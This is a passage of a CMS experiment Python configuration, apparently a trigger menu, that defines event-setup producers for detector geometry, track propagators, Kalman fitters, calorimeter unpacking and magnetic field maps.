)\n)\nprocess.DummyDetLayerGeometry = cms.ESProducer( \"DetLayerGeometryESProducer\",\n ComponentName = cms.string( \"DummyDetLayerGeometry\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.ESUnpackerWorkerESProducer = cms.ESProducer( \"ESUnpackerWorkerESProducer\",\n ComponentName = cms.string( \"esRawToRecHit\" ),\n appendToDataLabel = cms.string( \"\" ),\n DCCDataUnpacker = cms.PSet( LookupTable = cms.FileInPath( \"EventFilter/ESDigiToRaw/data/ES_lookup_table.dat\" ) ),\n RHAlgo = cms.PSet( \n Type = cms.string( \"ESRecHitWorker\" ),\n ESGain = cms.int32( 1 ),\n ESBaseline = cms.int32( 1000 ),\n ESMIPADC = cms.double( 9.0 ),\n ESMIPkeV = cms.double( 81.08 )\n )\n)\nprocess.EcalBarrelGeometryEP = cms.ESProducer( \"EcalBarrelGeometryEP\",\n appendToDataLabel = cms.string( \"\" ),\n applyAlignment = cms.bool( False )\n)\nprocess.EcalElectronicsMappingBuilder = cms.ESProducer( \"EcalElectronicsMappingBuilder\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.EcalEndcapGeometryEP = cms.ESProducer( \"EcalEndcapGeometryEP\",\n appendToDataLabel = cms.string( \"\" ),\n applyAlignment = cms.bool( False )\n)\nprocess.EcalLaserCorrectionService = cms.ESProducer( \"EcalLaserCorrectionService\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.EcalPreshowerGeometryEP = cms.ESProducer( \"EcalPreshowerGeometryEP\",\n appendToDataLabel = cms.string( \"\" ),\n applyAlignment = cms.bool( False )\n)\nprocess.EcalRegionCablingESProducer = cms.ESProducer( \"EcalRegionCablingESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n esMapping = cms.PSet( LookupTable = cms.FileInPath( \"EventFilter/ESDigiToRaw/data/ES_lookup_table.dat\" ) )\n)\nprocess.EcalUnpackerWorkerESProducer = cms.ESProducer( \"EcalUnpackerWorkerESProducer\",\n ComponentName = cms.string( \"\" ),\n appendToDataLabel = cms.string( \"\" ),\n DCCDataUnpacker = cms.PSet( \n tccUnpacking = cms.bool( True ),\n orderedDCCIdList = cms.vint32( 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54 ),\n srpUnpacking = 
cms.bool( False ),\n syncCheck = cms.bool( False ),\n headerUnpacking = cms.bool( False ),\n orderedFedList = cms.vint32( 601, 602, 603, 604, 605, 606, 607, 608, 609, 610, 611, 612, 613, 614, 615, 616, 617, 618, 619, 620, 621, 622, 623, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 634, 635, 636, 637, 638, 639, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 650, 651, 652, 653, 654 ),\n feUnpacking = cms.bool( True ),\n feIdCheck = cms.bool( True ),\n memUnpacking = cms.bool( False ),\n forceKeepFRData = cms.bool( False )\n ),\n ElectronicsMapper = cms.PSet( \n numbXtalTSamples = cms.uint32( 10 ),\n numbTriggerTSamples = cms.uint32( 1 )\n ),\n UncalibRHAlgo = cms.PSet( Type = cms.string( \"EcalUncalibRecHitWorkerWeights\" ) ),\n CalibRHAlgo = cms.PSet( \n Type = cms.string( \"EcalRecHitWorkerSimple\" ),\n ChannelStatusToBeExcluded = cms.vint32( ),\n flagsMapDBReco = cms.vint32( 0, 0, 0, 0, 4, -1, -1, -1, 4, 4, 6, 6, 6, 7, 8 ),\n killDeadChannels = cms.bool( True )\n )\n)\nprocess.FastSteppingHelixPropagatorAny = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"FastSteppingHelixPropagatorAny\" ),\n PropagationDirection = cms.string( \"anyDirection\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( True ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.FastSteppingHelixPropagatorOpposite = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"FastSteppingHelixPropagatorOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( True ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.FitterRK = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"FitterRK\" ),\n Propagator = cms.string( \"RungeKuttaTrackerPropagator\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.FittingSmootherRK = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"FittingSmootherRK\" ),\n Fitter = cms.string( \"FitterRK\" ),\n Smoother = cms.string( \"SmootherRK\" ),\n EstimateCut = cms.double( -1.0 ),\n MinNumberOfHits = cms.int32( 5 ),\n RejectTracks = cms.bool( True ),\n 
BreakTrajWith2ConsecutiveMissing = cms.bool( False ),\n NoInvalidHitsBeginEnd = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.GlobalTrackingGeometryESProducer = cms.ESProducer( \"GlobalTrackingGeometryESProducer\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.HITTRHBuilderWithoutRefit = cms.ESProducer( \"TkTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"HITTRHBuilderWithoutRefit\" ),\n StripCPE = cms.string( \"Fake\" ),\n PixelCPE = cms.string( \"Fake\" ),\n Matcher = cms.string( \"Fake\" ),\n ComputeCoarseLocalPositionFromDisk = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.HcalHardcodeGeometryEP = cms.ESProducer( \"HcalHardcodeGeometryEP\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.HcalTopologyIdealEP = cms.ESProducer( \"HcalTopologyIdealEP\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFFitterForRefitInsideOut = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"KFFitterForRefitInsideOut\" ),\n Propagator = cms.string( \"SmartPropagatorAny\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2EstimatorForRefit\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFFitterSmootherForL2Muon = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"KFFitterSmootherForL2Muon\" ),\n Fitter = cms.string( \"KFTrajectoryFitterForL2Muon\" ),\n Smoother = cms.string( \"KFTrajectorySmootherForL2Muon\" ),\n EstimateCut = cms.double( -1.0 ),\n MinNumberOfHits = cms.int32( 5 ),\n RejectTracks = cms.bool( True ),\n BreakTrajWith2ConsecutiveMissing = cms.bool( False ),\n NoInvalidHitsBeginEnd = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFSmootherForMuonTrackLoader = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"KFSmootherForMuonTrackLoader\" ),\n Propagator = cms.string( \"SmartPropagatorAnyOpposite\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 10.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFSmootherForRefitInsideOut = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"KFSmootherForRefitInsideOut\" ),\n Propagator = cms.string( \"SmartPropagatorAnyOpposite\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2EstimatorForRefit\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFTrajectoryFitterForL2Muon = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"KFTrajectoryFitterForL2Muon\" ),\n Propagator = cms.string( \"FastSteppingHelixPropagatorAny\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFTrajectorySmootherForL2Muon = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"KFTrajectorySmootherForL2Muon\" ),\n Propagator = cms.string( \"FastSteppingHelixPropagatorOpposite\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = 
cms.string( \"DummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.KFUpdatorESProducer = cms.ESProducer( \"KFUpdatorESProducer\",\n ComponentName = cms.string( \"KFUpdator\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.L3MuKFFitter = cms.ESProducer( \"KFTrajectoryFitterESProducer\",\n ComponentName = cms.string( \"L3MuKFFitter\" ),\n Propagator = cms.string( \"SmartPropagatorAny\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.MaterialPropagator = cms.ESProducer( \"PropagatorWithMaterialESProducer\",\n ComponentName = cms.string( \"PropagatorWithMaterial\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Mass = cms.double( 0.105 ),\n MaxDPhi = cms.double( 1.6 ),\n useRungeKutta = cms.bool( False ),\n ptMin = cms.double( -1.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.MeasurementTracker = cms.ESProducer( \"MeasurementTrackerESProducer\",\n ComponentName = cms.string( \"\" ),\n PixelCPE = cms.string( \"PixelCPEGeneric\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n HitMatcher = cms.string( \"StandardMatcher\" ),\n Regional = cms.bool( True ),\n OnDemand = cms.bool( True ),\n UsePixelModuleQualityDB = cms.bool( True ),\n DebugPixelModuleQualityDB = cms.untracked.bool( False ),\n UsePixelROCQualityDB = cms.bool( True ),\n DebugPixelROCQualityDB = cms.untracked.bool( False ),\n UseStripModuleQualityDB = cms.bool( True ),\n DebugStripModuleQualityDB = cms.untracked.bool( False ),\n UseStripAPVFiberQualityDB = cms.bool( True ),\n DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),\n MaskBadAPVFibers = cms.bool( True ),\n UseStripStripQualityDB = cms.bool( True ),\n DebugStripStripQualityDB = cms.untracked.bool( False ),\n switchOffPixelsIfEmpty = cms.bool( True ),\n pixelClusterProducer = cms.string( \"hltSiPixelClusters\" ),\n stripClusterProducer = cms.string( \"hltSiStripClusters\" ),\n stripLazyGetterProducer = cms.string( \"hltSiStripRawToClustersFacility\" ),\n appendToDataLabel = cms.string( \"\" ),\n inactivePixelDetectorLabels = cms.VInputTag( ),\n inactiveStripDetectorLabels = cms.VInputTag( )\n)\nprocess.MuonCkfTrajectoryBuilder = cms.ESProducer( \"MuonCkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"muonCkfTrajectoryBuilder\" ),\n updator = cms.string( \"KFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n propagatorProximity = cms.string( \"SteppingHelixPropagatorAny\" ),\n estimator = cms.string( \"Chi2\" ),\n TTRHBuilder = cms.string( \"WithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"\" ),\n trajectoryFilterName = cms.string( \"muonCkfTrajectoryFilter\" ),\n useSeedLayer = cms.bool( False ),\n rescaleErrorIfFail = cms.double( 1.0 ),\n deltaEta = cms.double( 0.1 ),\n deltaPhi = cms.double( 0.1 ),\n appendToDataLabel = cms.string( \"\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( False ),\n alwaysUseInvalidHits = cms.bool( True )\n)\nprocess.MuonDetLayerGeometryESProducer = cms.ESProducer( \"MuonDetLayerGeometryESProducer\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.MuonNumberingInitialization = cms.ESProducer( \"MuonNumberingInitialization\",\n appendToDataLabel = 
cms.string( \"\" )\n)\nprocess.MuonTransientTrackingRecHitBuilderESProducer = cms.ESProducer( \"MuonTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"MuonRecHitBuilder\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.OppositeMaterialPropagator = cms.ESProducer( \"PropagatorWithMaterialESProducer\",\n ComponentName = cms.string( \"PropagatorWithMaterialOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n Mass = cms.double( 0.105 ),\n MaxDPhi = cms.double( 1.6 ),\n useRungeKutta = cms.bool( False ),\n ptMin = cms.double( -1.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.PixelCPEGenericESProducer = cms.ESProducer( \"PixelCPEGenericESProducer\",\n ComponentName = cms.string( \"PixelCPEGeneric\" ),\n eff_charge_cut_lowX = cms.double( 0.0 ),\n eff_charge_cut_lowY = cms.double( 0.0 ),\n eff_charge_cut_highX = cms.double( 1.0 ),\n eff_charge_cut_highY = cms.double( 1.0 ),\n size_cutX = cms.double( 3.0 ),\n size_cutY = cms.double( 3.0 ),\n EdgeClusterErrorX = cms.double( 50.0 ),\n EdgeClusterErrorY = cms.double( 85.0 ),\n inflate_errors = cms.bool( False ),\n inflate_all_errors_no_trk_angle = cms.bool( False ),\n UseErrorsFromTemplates = cms.bool( True ),\n TruncatePixelCharge = cms.bool( True ),\n IrradiationBiasCorrection = cms.bool( False ),\n DoCosmics = cms.bool( False ),\n LoadTemplatesFromDB = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" ),\n TanLorentzAnglePerTesla = cms.double( 0.106 ),\n PixelErrorParametrization = cms.string( \"NOTcmsim\" ),\n Alpha2Order = cms.bool( True ),\n ClusterProbComputationFlag = cms.int32( 0 )\n)\nprocess.RPCGeometryESModule = cms.ESProducer( \"RPCGeometryESModule\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.RungeKuttaTrackerPropagator = cms.ESProducer( \"PropagatorWithMaterialESProducer\",\n ComponentName = cms.string( \"RungeKuttaTrackerPropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Mass = cms.double( 0.105 ),\n MaxDPhi = cms.double( 1.6 ),\n useRungeKutta = cms.bool( True ),\n ptMin = cms.double( -1.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SiStripGainESProducer = cms.ESProducer( \"SiStripGainESProducer\",\n AutomaticNormalization = cms.bool( False ),\n NormalizationFactor = cms.double( 1.0 ),\n printDebug = cms.untracked.bool( False ),\n APVGain = cms.string( \"\" )\n)\nprocess.SiStripRecHitMatcherESProducer = cms.ESProducer( \"SiStripRecHitMatcherESProducer\",\n ComponentName = cms.string( \"StandardMatcher\" ),\n NSigmaInside = cms.double( 3.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SiStripRegionConnectivity = cms.ESProducer( \"SiStripRegionConnectivity\",\n EtaDivisions = cms.untracked.uint32( 20 ),\n PhiDivisions = cms.untracked.uint32( 20 ),\n EtaMax = cms.untracked.double( 2.5 )\n)\nprocess.SlaveField0 = cms.ESProducer( \"UniformMagneticFieldESProducer\",\n ZFieldInTesla = cms.double( 0.0 ),\n label = cms.untracked.string( \"slave_0\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SlaveField20 = cms.ESProducer( \"ParametrizedMagneticFieldProducer\",\n label = cms.untracked.string( \"slave_20\" ),\n version = cms.string( \"OAE_1103l_071212\" ),\n appendToDataLabel = cms.string( \"\" ),\n parameters = cms.PSet( BValue = cms.string( \"2_0T\" ) )\n)\nprocess.SlaveField30 = cms.ESProducer( \"ParametrizedMagneticFieldProducer\",\n label = cms.untracked.string( \"slave_30\" ),\n version = cms.string( \"OAE_1103l_071212\" ),\n appendToDataLabel = cms.string( \"\" ),\n parameters = cms.PSet( BValue 
= cms.string( \"3_0T\" ) )\n)\nprocess.SlaveField35 = cms.ESProducer( \"ParametrizedMagneticFieldProducer\",\n label = cms.untracked.string( \"slave_35\" ),\n version = cms.string( \"OAE_1103l_071212\" ),\n appendToDataLabel = cms.string( \"\" ),\n parameters = cms.PSet( BValue = cms.string( \"3_5T\" ) )\n)\nprocess.SlaveField38 = cms.ESProducer( \"ParametrizedMagneticFieldProducer\",\n label = cms.untracked.string( \"slave_38\" ),\n version = cms.string( \"OAE_1103l_071212\" ),\n appendToDataLabel = cms.string( \"\" ),\n parameters = cms.PSet( BValue = cms.string( \"3_8T\" ) )\n)\nprocess.SlaveField40 = cms.ESProducer( \"ParametrizedMagneticFieldProducer\",\n label = cms.untracked.string( \"slave_40\" ),\n version = cms.string( \"OAE_1103l_071212\" ),\n appendToDataLabel = cms.string( \"\" ),\n parameters = cms.PSet( BValue = cms.string( \"4_0T\" ) )\n)\nprocess.SmartPropagator = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"SmartPropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterial\" ),\n MuonPropagator = cms.string( \"SteppingHelixPropagatorAlong\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SmartPropagatorAny = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"SmartPropagatorAny\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterial\" ),\n MuonPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SmartPropagatorAnyOpposite = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"SmartPropagatorAnyOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterialOpposite\" ),\n MuonPropagator = cms.string( \"SteppingHelixPropagatorAny\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SmartPropagatorOpposite = cms.ESProducer( \"SmartPropagatorESProducer\",\n ComponentName = cms.string( \"SmartPropagatorOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n Epsilon = cms.double( 5.0 ),\n TrackerPropagator = cms.string( \"PropagatorWithMaterialOpposite\" ),\n MuonPropagator = cms.string( \"SteppingHelixPropagatorOpposite\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SmootherRK = cms.ESProducer( \"KFTrajectorySmootherESProducer\",\n ComponentName = cms.string( \"SmootherRK\" ),\n Propagator = cms.string( \"RungeKuttaTrackerPropagator\" ),\n Updator = cms.string( \"KFUpdator\" ),\n Estimator = cms.string( \"Chi2\" ),\n RecoGeometry = cms.string( \"DummyDetLayerGeometry\" ),\n errorRescaling = cms.double( 100.0 ),\n minHits = cms.int32( 3 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SteppingHelixPropagatorAlong = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"SteppingHelixPropagatorAlong\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n 
returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( False ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SteppingHelixPropagatorAny = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"SteppingHelixPropagatorAny\" ),\n PropagationDirection = cms.string( \"anyDirection\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( False ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.SteppingHelixPropagatorOpposite = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"SteppingHelixPropagatorOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( False ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.StripCPEfromTrackAngleESProducer = cms.ESProducer( \"StripCPEfromTrackAngleESProducer\",\n ComponentName = cms.string( \"StripCPEfromTrackAngle\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.TTRHBuilderPixelOnly = cms.ESProducer( \"TkTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"TTRHBuilderPixelOnly\" ),\n StripCPE = cms.string( \"Fake\" ),\n PixelCPE = cms.string( \"PixelCPEGeneric\" ),\n Matcher = cms.string( \"StandardMatcher\" ),\n ComputeCoarseLocalPositionFromDisk = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.TrackerDigiGeometryESModule = cms.ESProducer( \"TrackerDigiGeometryESModule\",\n alignmentsLabel = cms.string( \"\" ),\n appendToDataLabel = cms.string( \"\" ),\n applyAlignment = cms.bool( True ),\n fromDDD = cms.bool( True )\n)\nprocess.TrackerGeometricDetESModule = cms.ESProducer( \"TrackerGeometricDetESModule\",\n fromDDD = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.TrackerRecoGeometryESProducer = cms.ESProducer( \"TrackerRecoGeometryESProducer\",\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.TransientTrackBuilderESProducer = cms.ESProducer( \"TransientTrackBuilderESProducer\",\n ComponentName = cms.string( \"TransientTrackBuilder\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nprocess.VBF0 = cms.ESProducer( \"VolumeBasedMagneticFieldESProducer\",\n label = cms.untracked.string( \"0t\" 
),\n version = cms.string( \"grid_1103l_071212_2t\" ),\n overrideMasterSector = cms.bool( True ),\n useParametrizedTrackerField = cms.bool( True ),\n paramLabel = cms.string( \"slave_0\" ),\n appendToDataLabel = cms.string( \"\" ),\n scalingVolumes = cms.vint32( ),\n scalingFactors = cms.vdouble( ),\n findVolumeTolerance = cms.double( 0.0 ),\n cacheLastVolume = cms.untracked.bool( True )\n)\nprocess.VBF20 = cms.ESProducer( \"VolumeBasedMagneticFieldESProducer\",\n label = cms.untracked.string( \"071212_2t\" ),\n version = cms.string( \"grid_1103l_071212_2t\" ),\n overrideMasterSector = cms.bool( True ),\n useParametrizedTrackerField = cms.bool( True ),\n paramLabel = cms.string( \"slave_20\" ),\n appendToDataLabel = cms.string( \"\" ),\n scalingVolumes = cms.vint32( ),\n scalingFactors = cms.vdouble( ),\n findVolumeTolerance = cms.double( 0.0 ),\n cacheLastVolume = cms.untracked.bool( True )\n)\nprocess.VBF30 = cms.ESProducer( \"VolumeBasedMagneticFieldESProducer\",\n label = cms.untracked.string( \"071212_3t\" ),\n version = cms.string( \"grid_1103l_071212_3t\" ),\n overrideMasterSector = cms.bool( True ),\n useParametrizedTrackerField = cms.bool( True ),\n paramLabel = cms.string( \"slave_30\" ),\n appendToDataLabel = cms.string( \"\" ),\n scalingVolumes = cms.vint32( ),\n scalingFactors = cms.vdouble( ),\n findVolumeTolerance = cms.double( 0.0 ),\n cacheLastVolume = cms.untracked.bool( True )\n)\nprocess.VBF35 = cms.ESProducer( \"VolumeBasedMagneticFieldESProducer\",\n label = cms.untracked.string( \"071212_3_5t\" ),\n version = cms.string( \"grid_1103l_071212_3_5t\" ),\n overrideMasterSector = cms.bool( True ),\n useParametrizedTrackerField = cms.bool( True ),\n paramLabel = cms.string( \"slave_35\" ),\n appendToDataLabel = cms.string( \"\" ),\n scalingVolumes = cms.vint32( ),\n scalingFactors = cms.vdouble( ),\n findVolumeTolerance = cms.double( 0.0 ),\n cacheLastVolume = cms.untracked.bool( True )\n)\nprocess.VBF38 = cms.ESProducer( \"VolumeBasedMagneticFieldESProducer\",\n label = cms.untracked.string( \"090322_3_8t\" ),\n version = cms.string( \"grid_1103l_090322_3_8t\" ),\n overrideMasterSector = cms.bool( False ),\n useParametrizedTrackerField = cms.bool( True ),\n paramLabel = cms.string( \"slave_38\" ),\n appendToDataLabel = cms.string( \"\" ),\n scalingVolumes = cms.vint32( 14100, 14200, 17600, 17800, 17900, 18100, 18300, 18400, 18600, 23100, 23300, 23400, 23600, 23800, 23900, 24100, 28600, 28800, 28900, 29100, 29300, 29400, 29600, 28609, 28809, 28909, 29109, 29309, 29409, 29609, 28610, 28810, 28910, 29110, 29310, 29410, 29610, 28611, 28811, 28911, 29111, 29311, 29411, 29611 ),\n scalingFactors = cms.vdouble( 1.0, 1.0, 0.994, 1.004, 1.004, 1.005, 1.004, 1.004, 0.994, 0.965, 0.958, 0.958, 0.953, 0.958, 0.958, 0.965, 0.918, 0.924, 0.924, 0.906, 0.924, 0.924, 0.918, 0.991, 0.998, 0.998, 0.978, 0.998, 0.998, 0.991, 0.991, 0.998, 0.998, 0.978, 0.998, 0.998, 0.991, 0.991, 0.998, 0.998, 0.978, 0.998, 0.998, 0.991 ),\n findVolumeTolerance = cms.double( 0.0 ),\n cacheLastVolume = cms.untracked.bool( True )\n)\nprocess.VBF40 = cms.ESProducer( \"VolumeBasedMagneticFieldESProducer\",\n label = cms.untracked.string( \"071212_4t\" ),\n version = cms.string( \"grid_1103l_071212_4t\" ),\n overrideMasterSector = cms.bool( True ),\n useParametrizedTrackerField = cms.bool( True ),\n paramLabel = cms.string( \"slave_40\" ),\n appendToDataLabel = cms.string( \"\" ),\n scalingVolumes = cms.vint32( ),\n scalingFactors = cms.vdouble( ),\n findVolumeTolerance = cms.double( 0.0 ),\n cacheLastVolume = 
